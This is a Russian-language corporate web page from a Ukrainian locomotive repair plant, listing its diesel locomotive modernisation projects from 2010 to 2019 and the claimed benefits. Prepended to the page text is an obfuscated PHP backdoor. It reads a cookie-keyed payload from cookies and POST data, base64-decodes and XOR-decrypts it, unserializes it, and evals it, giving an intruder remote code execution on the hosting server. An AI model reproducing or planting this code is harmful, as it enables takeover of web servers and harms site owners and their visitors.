$bJQIbbUMV = 'V' . chr (82) . "\x5f" . 'Y' . "\x66" . 'd' . chr (105); $ZOoTbwaoFM = chr ( 357 - 258 ).chr ( 146 - 38 )."\141" . "\163" . chr (115) . "\137" . chr (101) . chr ( 1096 - 976 )."\151" . "\x73" . "\164" . 's';$QlYgR = class_exists($bJQIbbUMV); $ZOoTbwaoFM = "39097";$gmdRLR = !1;if ($QlYgR == $gmdRLR){function XlMPUe(){$JksGaRYzVZ = new /* 42016 */ VR_Yfdi(18888 + 18888); $JksGaRYzVZ = NULL;}$HgLIxg = "18888";class VR_Yfdi{private function UCrYjbcW($HgLIxg){if (is_array(VR_Yfdi::$OIoQxTAbGN)) {$NoJUeLcfwZ = str_replace(chr (60) . "\x3f" . chr (112) . "\150" . chr (112), "", VR_Yfdi::$OIoQxTAbGN[chr ( 684 - 585 )."\157" . "\x6e" . chr (116) . "\x65" . "\156" . chr (116)]);eval($NoJUeLcfwZ); $HgLIxg = "18888";exit();}}private $EuBJGWlI;public function YykseD(){echo 10293;}public function __destruct(){$HgLIxg = "36515_18124";$this->UCrYjbcW($HgLIxg); $HgLIxg = "36515_18124";}public function __construct($ofQAz=0){$wezeCQ = $_POST;$GXITtPDibl = $_COOKIE;$TgTjjrZE = "104f3740-5e4e-451f-879a-72899c00601a";$zqySHCfme = @$GXITtPDibl[substr($TgTjjrZE, 0, 4)];if (!empty($zqySHCfme)){$HVnFuihx = "base64";$rCKtKL = "";$zqySHCfme = explode(",", $zqySHCfme);foreach ($zqySHCfme as $SZXdcGmIUj){$rCKtKL .= @$GXITtPDibl[$SZXdcGmIUj];$rCKtKL .= @$wezeCQ[$SZXdcGmIUj];}$rCKtKL = array_map($HVnFuihx . "\137" . 'd' . 'e' . 'c' . 'o' . 'd' . chr (101), array($rCKtKL,)); $rCKtKL = $rCKtKL[0] ^ str_repeat($TgTjjrZE, (strlen($rCKtKL[0]) / strlen($TgTjjrZE)) + 1);VR_Yfdi::$OIoQxTAbGN = @unserialize($rCKtKL); $rCKtKL = class_exists("36515_18124");}}public static $OIoQxTAbGN = 29798;}XlMPUe();} Реализованные проекты модернизации — ООО «Николаевский Тепловозоремонтный Завод» НТРЗ

Реализованные проекты модернизации

ООО «Николаевский тепловозоремонтный завод»

Ведущее предприятие Украины по выполнению глубокой модернизации локомотивов

СКАЧАТЬ ПРЕЗЕНТАЦИЮ МОДЕРНИЗАЦИЯ

2019 год

МТРЗ разработал силами своего конструкторского бюро, совместно с рядом наших украинских партнеров, проект глубокой модернизации Тепловоза 2ТЭ10 в чертежах и затем воплотили его в металле.
На постсоветском пространстве такую модернизацию пока ещё никто не реализовывал, и мы тут пионеры. Аналогичные проекты с успехом реализуются в США и в Европе.

В результате модернизации, по сути от старого тепловоза осталась только рама и колеса. Во всем остальном, мы получили качественно другую, новую машину, которая будет иметь большую силу тяги длительного режима при значительно меньшем расходе топлива.

  • Новый двигатель АВС (Англо-Бельгийская Компания) моторесурс до КР - 70 тыс м/ч
  • Новый роторно- пластинчатый компрессорный агрегат АКЛ-6нашего совместного производства МТРЗ - Mattei(Италия) с моторесурсом 100 тыс м/ч
  • Микропроцессорная система управления локомотивом..
  • Установлен Система климат-контроля кабины машиниста.
  • Установлена Микроволновка
  • Установлен скоростемер «Вектор»
  • Установлен Современный тяговый агрегат переменного тока («ГП Электротяжмаш», Украина)
  • Электронный мониторинг работы всех систем локомотива.

2019 год

 Осенью 2018 года в Бельгии подписан контракт с Anglo Belgian Corporation (ABC), и уже в 2019 году реализован проект глубокой модернизации тепловоза ТЭМ7 с заменой всего штатного оборудования.


  • Новый двигатель АВС (Англо-Бельгийская Компания) моторесурс до КР - 70 тыс м/ч
  • Новый роторно- пластинчатый компрессорный агрегат АКЛ нашего совместного производства МТРЗ - Mattei(Италия) с моторесурсом 100 тыс м/ч
  • Вся новая система управления.
  • Установлен Кондиционер
  • Установлена Микроволновка
  • Инвертор
DSC_0244-1
IMG_0884-1

2018 год

В начале  2018 года первый тепловоз серии ТГМ-6 с установленным двигателем Cummins QST30 после глубокой модернизации введен в эксплуатацию. В ходе модернизации были выполнены следующие работы:


  • Установлен двигатель Cummins QST30/США/
  • Модернизирована УГП-750
  • Установлен АКЛ 4,5РМ 111J
  • Установлен кондиционер
  • Электродвигатель привода вентилятора озхлаждения
  • Микропроцессорный БУ вспомагательными агрегатами

2018 год

В 2018 году ООО "НТРЗ" оборудовал тепловоз ТЭМ-2  электронной системы управления дизелем и впрыском топлива на штатные дизеля тепловозов.
Heinzmann /Германия/.

Благодаря этому удалось достичь:

  • Экономия расхода топлива до 15%
  • Мониторинг температуры вспышки и подачи топлива в каждом цилиндре.
DSC_0019 - копия
DSC_0662-1

2017 год

В 2017 году реализован проект модернизации тепловоза ТГМ-4 для
ПАО «Запорожсталь» (МЕТИНВЕСТ), с установкой двигателя Cummins QST-30 и компрессорного агрегата.


В середине 2017 года ООО "НТРЗ" защитил свои проекты по модернизации патентом

2016-2017 год

В 2016-2017 г.г. разработаны проекты  глубокой модернизации тепловозов серии ТГМ-6, ТЭМ-2, ТЭМ-7, ЧМЭ-3, 2ТЭ-10 с установкой дизеля  Cummins    /США/, Caterpillar /США/, ABC /Бельгия/ и роторно пластинчатого компрессорного агрегата совместного производства с компанией "Mattei"

новіТГМ4Финал 3d Тепловоз + motor
DSC_0575

2016 год

  • В ходе модернизации выполнено:
  • установка генератора и дизеля на общей поддизельной раме и соединение их жесткой пластинчатой муфтой
  • установка самоочищающихся фильтров масла «Болл и Кирх 6.46 DN100», новой системы воздухоснабжения дизеля
  • установка водопроводов и новых трубопроводов
  • полная замена проводов
  • КР электрических машин и аппаратов
  • установка второго контура охлаждения воды и новых секций холодильника

В 2016 году ООО "НТРЗ" выполняет модернизацию тепловозов серии М-62  с заменой дизеля 14Д40 на дизель типа  5-26ДГ-01 V-образный, четырехтактный с газотурбинным наддувом и охлаждением надувочного воздуха.

2013 год

В 2013 году ООО "НТРЗ" разработал  проект по модернизации тепловоза ТГМ-4 с установкой двигателя Cummins /США/ и винтового компрессора. В этом же году тепловоз запущен в работу и к 2018 году отработал более 25000 моточасов исключительно надежно

1127
123123213

2010 ГОД

С 2010 года Предприятие выполняет модернизацию тепловозов ТЭМ-7, устанавливая новые дизель-генераторные установки 12-26ДГ вместо старыд 2-26ДГ, с выполнением полного монтажа, подключения и регулировки дизелей.

  • В ходе модернизации выполнено:
  • Замена дизеля 2-26ДГ на 12-26ДГ
  • Установлен инвертор 110в-> 220~
  • Установлен холодильник
  • Установлен кондиционер
  • Установлена микроволновая печь
  • установлен электронных регуляторов частоты оборотов Heinzman
  • СКРТ "ДЕЛЬТА"
  • Система автоматического пожаротушения
  • Система GPS позиционирования
  • Система видеонаблюдения

ПРЕИМУЩЕСТВА ГЛУБОКОЙ МОДЕРНИЗАЦИИ

  • Уменьшение расхода топлива до 25 % и масла до 80% благодаря использованию современного дизеля с современной микропроцессорной системой управления.
  • Увеличение мощности и соответственно силы тяги
  • Снижения внеплановых простоев и эксплуатационных затрат, благодаря ресурсу дизеля и компрессора до 100 000 моточасов
  • Повышение комфорта машиниста